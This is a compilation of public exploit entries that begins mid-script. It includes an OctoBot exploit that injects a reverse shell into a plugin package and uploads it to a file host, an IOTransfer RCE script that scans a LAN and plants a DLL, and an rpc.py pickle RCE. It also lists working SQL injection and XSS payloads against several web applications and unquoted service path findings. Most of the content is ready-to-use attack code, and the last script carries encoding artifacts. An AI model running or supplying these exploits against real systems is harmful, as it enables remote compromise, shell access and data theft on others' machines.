addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))
with open('{}metadata.py'.format(path),'w') as newMetadataFile:
newMetadataFile.write(addPayload)
def injectInitFile(path):
with open('{}__init__.py'.format(path),'r') as initFile:
content = initFile.read()
addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))
addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))
with open('{}__init__.py'.format(path),'w') as newInitFile:
newInitFile.write(addPayload)
def rePackTentaclePackage():
print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')
with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:
len_dir_path = len('quests')
for root, _, files in os.walk('quests'):
for file in files:
file_path = os.path.join(root, file)
zipf.write(file_path, file_path[len_dir_path:])
def uploadMaliciousTentacle():
print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')
file = {
'file': open('any_platform.zip', 'rb'),
}
response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)
zipLink = response.json()['data']['file']['url']['full']
response = requests.get(zipLink, timeout=60)
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
zipLink = soup.find(id='download-url').get('href')
print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))
return zipLink
def curl(url):
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
return response
def injectBackdoor(RHOST, RPORT, zipLink):
print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')
if RPORT == 443:
url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
else:
url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
headers = {
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
}
data = '{"'+zipLink+'":"register_and_install"}'
response = requests.post(url, headers=headers, data=data)
response = response.content.decode('utf-8').replace('"', '').strip()
os.remove('any_platform.zip')
if response != 'Tentacles installed':
print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')
exit()
print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))
if RPORT == 443:
url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
else:
url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
return curl(url)
def isPassword(RHOST, RPORT):
if RPORT == 443:
url = 'https://{}:{}'.format(RHOST, RPORT)
else:
url = 'http://{}:{}'.format(RHOST, RPORT)
return curl(url)
def main():
banner()
args = parser.parse_args()
if isPassword(args.RHOST, args.RPORT).status_code != 200:
print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')
octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')
if len(octobotVersion) > 0:
print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))
downloadTentaclePackage(octobotVersion)
unzipTentaclePackage(octobotVersion)
craftBackdoor(octobotVersion)
rePackTentaclePackage()
zipLink = uploadMaliciousTentacle()
injectBackdoor(args.RHOST, args.RPORT, zipLink)
restartOctobot(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)
parser.add_argument('-h', '--help', help=help())
parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin
## Description:
The parameter `idx` from the Visual Slide Box Builder plugin app for
WordPress appears to be vulnerable to SQLi.
The attacker can receive all database information from the WordPress
database and he can use it for very malicious purposes.
[+] Payloads:
```mysql
---
Parameter: idx (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
# Discovery Date: 2022-05-07
# Discovery by: Esant1490
# Vendor Homepage: https://drfone.wondershare.net
# Software Link : https://download.wondershare.net/drfone_full4008.exe
# Tested Version: 4.0.8
# Tested on OS: Windows 10 Pro x64 en
# Vulnerability Type: Unquoted Service Path
# Find the discover Unquoted Service Path Vulnerability:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """
Wondershare Install Assist Service Wondershare InstallAssist
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
Wondershare Application Framework Service WsAppService C:\Program Files
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
Wondershare Application Update Service 3.0
WsAppService3 C:\Program Files
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
Wondershare Driver Install Service WsDrvInst C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
# Service info:
C:\>sc qc WsDrvInst
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt to exploit this vulnerability could allow to execute
code during startup or reboot with the elevated privileges.
# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
# Date: 08/05/2022
# Exploit Author: Giulio Garzia 'Ozozuz'
# Vendor Homepage: https://www.magnolia-cms.com/
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
# Version: 6.2.19
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-33098
Explanation
Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.
===== REQUEST =====
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
Content-Length: 620
Connection: close
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
-----------------------------399178799522967017241464837908
Content-Disposition: form-data; name="140_file"; filename="xss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('POC - Magnolia CMS');
</script>
</svg>
-----------------------------399178799522967017241464837908--
# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
# Date: 06/22/2022
# Exploit Author: Tomer Peled
# Vendor Homepage: https://www.iobit.com
# Software Link: https://iotransfer.itopvpn.com/
# Version: V4 and onward
# Tested on: Windows 10
# CVE : 2022-24562
# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562
import os
from urllib3.exceptions import ConnectTimeoutError
from win32com.client import *
import requests
import json
localPayloadPath = r"c:\temp\malicious.dll"
remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"
remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'
Range = "192.168.89"
UpOrDown="Upload"
IP = ""
UserName = ""
def get_version_number(file_path):
information_parser = Dispatch("Scripting.FileSystemObject")
version = information_parser.GetFileVersion(file_path)
return version
def getTaskList(IP, taskid=""):
print("Getting task list...")
url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
res = requests.get(url)
tasks = json.loads(res.content)
tasks = json.loads(tasks['content'])
for task in tasks['tasks']:
if taskid == task['taskid']:
print(f"Task ID found: {taskid}")
def CreateUploadTask(IP):
SetSavePath(IP)
url = f'http://{IP}:7193/index.php?action=createtask'
task = {
'method': 'get',
'version': '1',
'userid': '*',
'taskstate': '0',
}
res = requests.post(url, json=task)
task = json.loads(res.content)
task = json.loads(task['content'])
taskid = task['taskid']
print(f"[*] TaskID: {taskid}")
return taskid
def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
file_info = {
'size': size,
'savefilename': remotePath,
'name': remotePath,
'fullpath': r'c:\windows\system32\calc.exe',
'md5': 'md5md5md5md5md5',
'filetype': '3',
}
res = requests.post(url, json=file_info)
js = json.loads(res.content)
print(f"[V] Create Detail returned: {js['code']}")
def readFile(Path):
file = open(Path, "rb")
byte = file.read(1)
next = "Start"
while next != b'':
byte = byte + file.read(1023)
next = file.read(1)
if next != b'':
byte = byte + next
file.close()
return byte
def CallUpload(IP, taskid, localPayloadPath):
url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
send_data = readFile(localPayloadPath)
try:
res = requests.post(url, data=send_data)
js = json.loads(res.content)
if js['code'] == 200:
print("[V] Success payload uploaded!")
else:
print(f"CreateRemoteFile: {res.content}")
except:
print("[*] Reusing the task...")
res = requests.post(url, data=send_data)
js = json.loads(res.content)
if js['code'] == 200 or "false" in js['error']:
print("[V] Success payload uploaded!")
else:
print(f"[X] CreateRemoteFile Failed: {res.content}")
def SetSavePath(IP):
url = f'http://{IP}:7193/index.php?action=setiotconfig'
config = {
'tasksavepath': 'C:\\Program '
}
requests.post(url, json=config)
def ExploitUpload(IP,payloadPath,rPath,taskid =None):
if not taskid:
taskid = CreateUploadTask(IP)
size = os.path.getsize(payloadPath)
CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
CallUpload(IP, taskid, payloadPath)
def CreateDownloadTask(IP, Path) -> str:
url = f'http://{IP}:7193/index.php?action=createtask'
task = {
'method': 'get',
'version': '1',
'userid': '*',
'taskstate': '0',
'filepath': Path
}
res = requests.post(url, json=task)
task = json.loads(res.content)
task = json.loads(task['content'])
taskid = task['taskid']
print(f"TaskID: {taskid}")
return taskid
def ExploitDownload(IP, DownloadPath, ID=None):
if ID:
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
else:
taskid = CreateDownloadTask(IP, DownloadPath)
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
res = requests.get(url)
return res
def ScanIP(startRange):
print("[*] Searching for vulnerable IPs", end='')
Current = 142
IP = f"{startRange}.{Current}"
VulnerableIP: str = ""
UserName: str = ""
while Current < 252:
print(".", end='')
url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
try:
res = requests.get(url, timeout=1)
js = json.loads(res.content)
js2 = json.loads(js['content'])
UserName = js2['name']
VulnerableIP=IP
print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
print(f"[!] Vulnerable PC username: {UserName}")
return VulnerableIP,UserName
except Exception as e:
pass
except ConnectTimeoutError:
pass
IP = f"{startRange}.{Current}"
Current = Current + 1
return None,None
if __name__ == '__main__':
IP,UserName = ScanIP(Range)
if IP is None or UserName is None:
print("[X] No vulnerable IP found")
exit()
print("[*] Starting Exploit...")
if UpOrDown == "Upload":
print(f"[*]Local Payload Path: {localPayloadPath}")
print(f"[*]Remote Upload Path: {remotePayloadPath}")
ExploitUpload(IP,localPayloadPath,remotePayloadPath)
elif UpOrDown == "Download":
print(f"[*] Downloading the file: {remoteDownloadPath}")
res = ExploitDownload(IP, remoteDownloadPath)
file = open("out.pdf", "wb+")
file.write(res.content)
file.close()
# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path
# Date: 2020-11-6
# Exploit Author: Ghaleb Al-otaibi
# Vendor Homepage: https://www.kite.com/
# Version: Version 4.2.0.1 U1
# Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044
# CVE : NA
# Service info:
C:\Windows\system32\cmd.exe>sc qc KiteService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KiteService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KiteService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
## Description:
The value of the eMail request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can trick the users of this system, very easy to visit a
very dangerous link from anywhere, and then the game will over for
these customers.
Also, the attacker can create a network from botnet computers by using
this vulnerability.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```POST
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
## Proof and Exploit:
[href](https://streamable.com/3r4t36)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green
#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on: Microsoft Windows Server 2019 Datacenter x64
# Description:
# Lavasoft 4.1.0.409 install DCIservice as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes
#Discover the Unquoted Service path
C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto
C:\Users\p4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: DCIService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DCIService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Date: 05.11.2022
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 FROM
(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
---
```
# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
# Date: 12/06/2022
# Exploit Author: twseptian
# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
# Version: v1.0
# Tested on: Kali Linux
# Vulnerable code
line 9 in file "/oahms/admin/login.php"
$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
# Steps of reproduce:
1. Go to the admin login page http://localhost/oahms/admin/login.php
2. sqli payload: admin' or '1'='1';-- -
3. password: password
# Proof of Concept
POST /oahms/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/oahms/admin/login.php
Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST =3D "127.0.0.1:65432"
URL =3D f"http://{HOST}/sayhi"
HEADERS =3D {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload =3D pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload =3D generate_payload(cmd)
requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
def main():
exec_command('curl http://127.0.0.1:4321')
# exec_command('uname -a')
if __name__ =3D=3D "__main__":
main()